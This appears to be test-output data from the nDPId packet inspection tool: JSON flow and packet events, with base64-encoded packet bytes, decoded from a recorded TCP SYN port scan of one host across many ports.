-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsmf0AACUGiXWsEAAIQA2GNIzSDkvdUoMYAAAAAGACCAAiRAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAss\/0AACsGaXWsEAAIQA2GNIzSBBvdUoMYAAAAAGACEAAkdAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsz\/oAACoGTnisEAAIQA2GNIzSAiHdUoMYAAAAAGACDAAqbgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSIAACsG4FCsEAAIQA2GNIzSB9TdUoMYAAAAAGACEAAguwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAshZcAADUGjdusEAAIQA2GNIzSA+rdUoMYAAAAAGACCAAspQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAs2oIAADoGM\/CsEAAIQA2GNIzSCindUoMYAAAAAGACDAAiZgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsy1EAACUGWCGsEAAIQA2GNIzSBEXdUoMYAAAAAGACCAAsSgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsgekAADsGi4msEAAIQA2GNIzSF2XdUoMYAAAAAGACEAARKgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsXasAADMGt8esEAAIQA2GNIzSEcbdUoMYAAAAAGACEAAWyQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsAAgAADkGD2usEAAIQA2GNIzTHwHdU4MZAAAAAGACCAARiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1QAACcG6h6sEAAIQA2GNIzTB3rdU4MZAAAAAGACEAAhEgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/3IAACkGIACsEAAIQA2GNIzTH5rdU4MZAAAAAGACCAAQ8gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsWowAADkGtOasEAAIQA2GNIzTA+ndU4MZAAAAAGACCAAsowAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsPj8AADgG0jOsEAAIQA2GNIzTCDTdU4MZAAAAAGACBAAsWAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsHb4AAC0G\/bSsEAAIQA2GNIzTBfHdU4MZAAAAAGACCAAqmwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAst4YAADUGW+ysEAAIQA2GNIzTBDrdU4MZAAAAAGACCAAsUgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAseH0AACUGqvWsEAAIQA2GNIzTAATdU4MZAAAAAGACCAAwiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAs5QAAACYGPXKsEAAIQA2GNIzTC5fdU4MZAAAAAGACDAAg9QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsG8IAADcG9bCsEAAIQA2GNIzTH2rdU4MZAAAAAGACEAAJIgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsGWQAADcG+A6sEAAIQA2GNIzTFw3dU4MZAAAAAGACEAARfwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsmC0AACkGh0WsEAAIQA2GNIzTAeHdU4MZAAAAAGACCAAuqwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsqo0AADAGbeWsEAAIQA2GNIzTBCrdU4MZAAAAAGACBAAwYgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsj2EAADAGiRGsEAAIQA2GNIzTFKDdU4MZAAAAAGACBAAf7AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsTgwAADAGymasEAAIQA2GNIzSHmLdUoMYAAAAAGACBAAWLQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 